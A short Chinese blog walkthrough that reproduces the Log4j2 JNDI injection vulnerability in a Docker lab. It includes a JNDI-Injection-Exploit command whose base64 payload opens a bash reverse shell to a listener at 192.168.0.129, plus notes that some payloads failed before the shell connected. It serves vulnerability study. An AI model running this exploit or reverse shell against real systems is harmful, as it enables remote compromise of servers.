热门标签
热门文章
- 1【OpenPLC】OpenPLC Editor编辑器使用
- 2Task list not built during sync
- 3“消费盲返”的商业模式,你知道多少?_消费盲返模式
- 4python中、常见的结构化数据不包括_使用python读取文本中结构化数据
- 5【Linux】vim三种模式切换、常用命令_linux中vim三种模式切换
- 6MJRefresh源码剖析与学习
- 7如何使用Web3.js API 在页面中进行转账
- 8pytorch从dataloader取一个batch的数据_从dataloader中取出一个batch
- 9python之pandas简单介绍及使用(一)
- 10linux 查看io 进程,如何查看具体进程的IO情况?
当前位置: article > 正文
Apache Log4j2 lookup JNDI 注入漏洞_log4j 漏洞 sql注入
作者:IT小白 | 2024-04-15 13:39:30
赞
踩
log4j 漏洞 sql注入
1 docker启动环境
2 poc抓包构造payload
3 一定要在kali使用JNDIExploit进行漏洞利用,将上面Base64编码结果和攻击机ip填入指定位置
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTI5Lzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.0.129
5 kali开启监听
6 上面的一个payload不行,都试过一遍。
7 反弹成功,payload都试过一遍,有一些不行。
声明:本文内容由网友自发贡献,转载请注明出处:【wpsshop】
推荐阅读
相关标签
